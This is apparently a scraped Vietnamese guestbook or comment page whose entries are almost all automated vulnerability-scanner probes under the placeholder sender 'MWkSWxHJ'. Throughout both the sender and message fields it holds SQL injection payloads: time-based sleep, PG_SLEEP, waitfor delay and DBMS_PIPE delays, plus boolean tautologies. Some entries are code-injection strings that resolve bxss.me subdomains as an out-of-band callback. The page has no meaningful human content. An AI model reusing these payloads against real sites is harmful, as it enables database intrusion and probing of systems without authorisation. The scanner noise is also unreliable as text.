Người gửi: MWkSWxHJ - (04/12/2022 10:48:59)

Người gửi: MWkSWxHJ - (04/12/2022 10:48:58)

Người gửi: 0"XOR(if(now()=sysdate(),sleep(12),0))XOR"Z - (04/12/2022 10:48:58)

Người gửi: MWkSWxHJ - (04/12/2022 10:48:58)

Người gửi: 0'XOR(if(now()=sysdate(),sleep(12),0))XOR'Z - (04/12/2022 10:48:57)

Người gửi: MWkSWxHJ - (04/12/2022 10:48:56)

Người gửi: if(now()=sysdate(),sleep(12),0) - (04/12/2022 10:48:56)

Người gửi: MWkSWxHJ - (04/12/2022 10:48:55)

Người gửi: 136' - (04/12/2022 10:48:55)

Người gửi: MWkSWxHJ - (04/12/2022 10:48:55)

Người gửi: MWkSWxHJ - (04/12/2022 10:48:54)

Người gửi: MWkSWxHJ - (04/12/2022 10:48:54)

Người gửi: -1" OR 2+399-399-1=0+0+0+1 -- - (04/12/2022 10:48:53)

Người gửi: MWkSWxHJ - (04/12/2022 10:48:53)

Người gửi: MWkSWxHJ - (04/12/2022 10:48:52)

Người gửi: -1' OR 2+640-640-1=0+0+0+1 or 'z8PewBUb'=' - (04/12/2022 10:48:52)

Người gửi: MWkSWxHJ - (04/12/2022 10:48:52)

Người gửi: MWkSWxHJ - (04/12/2022 10:48:51)

Người gửi: -1' OR 2+425-425-1=0+0+0+1 -- - (04/12/2022 10:48:51)

Người gửi: MWkSWxHJ - (04/12/2022 10:48:51)

Người gửi: -1 OR 2+201-201-1=0+0+0+1 - (04/12/2022 10:48:50)

Người gửi: MWkSWxHJ - (04/12/2022 10:48:50)

Người gửi: MWkSWxHJ - (04/12/2022 10:48:50)

Người gửi: -1 OR 2+538-538-1=0+0+0+1 -- - (04/12/2022 10:48:49)

Người gửi: MWkSWxHJ - (04/12/2022 10:48:49)

Người gửi: MWkSWxHJ - (04/12/2022 10:48:49)

Người gửi: awxCWyfE - (04/12/2022 10:48:48)

Người gửi: MWkSWxHJ - (04/12/2022 10:48:48)

Người gửi: MWkSWxHJ - (04/12/2022 10:48:48)

Người gửi: MWkSWxHJ - (04/12/2022 10:48:47)

Người gửi: MWkSWxHJ - (04/12/2022 10:48:47)

Người gửi: MWkSWxHJ - (04/12/2022 10:48:46)

Người gửi: MWkSWxHJ - (04/12/2022 10:48:46)

Người gửi: MWkSWxHJ - (04/12/2022 10:48:46)

Người gửi: MWkSWxHJ - (04/12/2022 10:48:46)

Người gửi: MWkSWxHJ - (04/12/2022 10:48:45)
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),14)||'
Người gửi: MWkSWxHJ - (04/12/2022 10:48:45)

Người gửi: MWkSWxHJ - (04/12/2022 10:48:44)

Người gửi: MWkSWxHJ - (04/12/2022 10:48:43)
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),14)
Người gửi: MWkSWxHJ - (04/12/2022 10:48:43)

Người gửi: ".gethostbyname(lc("hitey"."vosvgryl08b70.bxss.me."))."A".chr(67).chr(hex("58")).chr(108).chr(76).chr(98).chr(78)." - (04/12/2022 10:48:43)

Người gửi: MWkSWxHJ - (04/12/2022 10:48:43)

Người gửi: MWkSWxHJ - (04/12/2022 10:48:43)

Người gửi: MWkSWxHJ - (04/12/2022 10:48:42)
u9tLATb8')) OR 127=(SELECT 127 FROM PG_SLEEP(14))--
Người gửi: MWkSWxHJ - (04/12/2022 10:48:42)

Người gửi: MWkSWxHJ - (04/12/2022 10:48:41)

Người gửi: '.gethostbyname(lc('hitlv'.'tyqpeyke8be1a.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(107).chr(85).chr(109).chr(86).' - (04/12/2022 10:48:41)

Người gửi: MWkSWxHJ - (04/12/2022 10:48:41)

Người gửi: MWkSWxHJ - (04/12/2022 10:48:40)
Hda1N8FL') OR 500=(SELECT 500 FROM PG_SLEEP(14))--
Người gửi: MWkSWxHJ - (04/12/2022 10:48:40)
".gethostbyname(lc("hiteh"."jqegqtbh670b9.bxss.me."))."A".chr(67).chr(hex("58")).chr(117).chr(71).chr(116).chr(69)."
Người gửi: MWkSWxHJ - (04/12/2022 10:48:40)

Người gửi: MWkSWxHJ - (04/12/2022 10:48:39)
3WwTuVEp' OR 664=(SELECT 664 FROM PG_SLEEP(14))--
Người gửi: MWkSWxHJ - (04/12/2022 10:48:39)

Người gửi: MWkSWxHJ - (04/12/2022 10:48:39)

Người gửi: MWkSWxHJ - (04/12/2022 10:48:39)
'.gethostbyname(lc('hitrz'.'rihpclxl39627.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(102).chr(69).chr(104).chr(71).'
Người gửi: MWkSWxHJ - (04/12/2022 10:48:38)

Người gửi: MWkSWxHJ - (04/12/2022 10:48:38)

Người gửi: MWkSWxHJ - (04/12/2022 10:48:37)
-1)) OR 621=(SELECT 621 FROM PG_SLEEP(14))--
Người gửi: MWkSWxHJ - (04/12/2022 10:48:37)
-5) OR 922=(SELECT 922 FROM PG_SLEEP(14))--
Người gửi: MWkSWxHJ - (04/12/2022 10:48:36)

Người gửi: MWkSWxHJ - (04/12/2022 10:48:36)

Người gửi: MWkSWxHJ - (04/12/2022 10:48:35)
-5 OR 927=(SELECT 927 FROM PG_SLEEP(14))--
Người gửi: MWkSWxHJ - (04/12/2022 10:48:34)

Người gửi: MWkSWxHJ - (04/12/2022 10:48:34)
GqY64Li9')); waitfor delay '0:0:14' --
Người gửi: MWkSWxHJ - (04/12/2022 10:48:34)

Người gửi: MWkSWxHJ - (04/12/2022 10:48:34)
Xj8bwGPd'); waitfor delay '0:0:14' --
Người gửi: MWkSWxHJ - (04/12/2022 10:48:33)

Người gửi: MWkSWxHJ - (04/12/2022 10:48:33)

Người gửi: MWkSWxHJ - (04/12/2022 10:48:33)